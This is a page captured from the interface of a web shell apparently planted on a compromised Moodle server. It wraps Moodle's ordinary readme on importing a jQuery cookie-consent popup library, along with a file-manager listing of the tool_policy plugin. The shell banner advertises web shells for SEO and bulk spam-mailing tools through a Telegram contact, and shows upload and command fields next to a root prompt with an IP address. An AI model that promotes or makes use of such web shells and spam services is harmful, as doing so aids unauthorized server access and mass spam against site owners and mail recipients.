__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.120: ~ $
jQuery EU Cookie Law popups 1.1.3
-------------
https://github.com/wimagguc/jquery-eu-cookie-law-popup

Instructions to import 'jQuery EU Cookie Law popups' into Moodle:

1. Download the latest release from https://github.com/wimagguc/jquery-eu-cookie-law-popup/releases
2. Copy 'js/jquery-eu-cookie-law-popup.js' into 'amd/src/jquery-eu-cookie-law-popup.js':

   2.a. Replace jquery reference
------------------
(function($) {
------------------
with
------------------
define(['jquery'],function($) {
------------------

   2.b. Remove initialisation code. It will be added and configured only in the pages where is needed
------------------
$(document).ready( function() {
  if ($(".eupopup").length > 0) {
    $(document).euCookieLawPopup().init({
      'info' : 'YOU_CAN_ADD_MORE_SETTINGS_HERE',
      'popupTitle' : 'This website is using cookies. ',
      'popupText' : 'We use them to give you the best experience. If you continue using our website, we\'ll assume that you are happy to receive all cookies on this website.'
    });
  }
});
------------------

   2.c. Remove code
------------------
$(document).bind("user_cookie_consent_changed", function(event, object) {
  console.log("User cookie consent changed: " + $(object).attr('consent') );
});
------------------

   2.d. Replace
------------------
}(jQuery));
------------------
with
------------------
});
------------------

3. Copy the following styles from 'css/jquery-eu-cookie-law-popup.css' into the
"jquery-eu-cookie-law-popup styles" section in 'styles.css':
   .eupopup-container
   .eupopup-container-bottom
   .eupopup-closebutton
   .eupopup-buttons
   .eupopup-button
   .eupopup-button:hover
   .eupopup-button:focus

   Add "tool_policy styles" to the end of the styles file.

4. Execute grunt to compile js
   grunt amd

5. Update version number in admin/tool/policy/thirdpartylibs.xml

Filemanager

Name Type Size Permission Actions
amd Folder 0755
classes Folder 0755
db Folder 0755
lang Folder 0755
pix Folder 0755
templates Folder 0755
tests Folder 0755
accept.php File 2.45 KB 0644
acceptances.php File 2.61 KB 0644
editpolicydoc.php File 6.35 KB 0644
index.php File 3.12 KB 0644
lib.php File 6.16 KB 0644
managedocs.php File 1.39 KB 0644
readme_moodle.txt File 1.83 KB 0644
settings.php File 1.77 KB 0644
styles.css File 1.63 KB 0644
thirdpartylibs.xml File 542 B 0644
user.php File 2.32 KB 0644
version.php File 1.18 KB 0644
view.php File 2.36 KB 0644
viewall.php File 1.48 KB 0644
Filemanager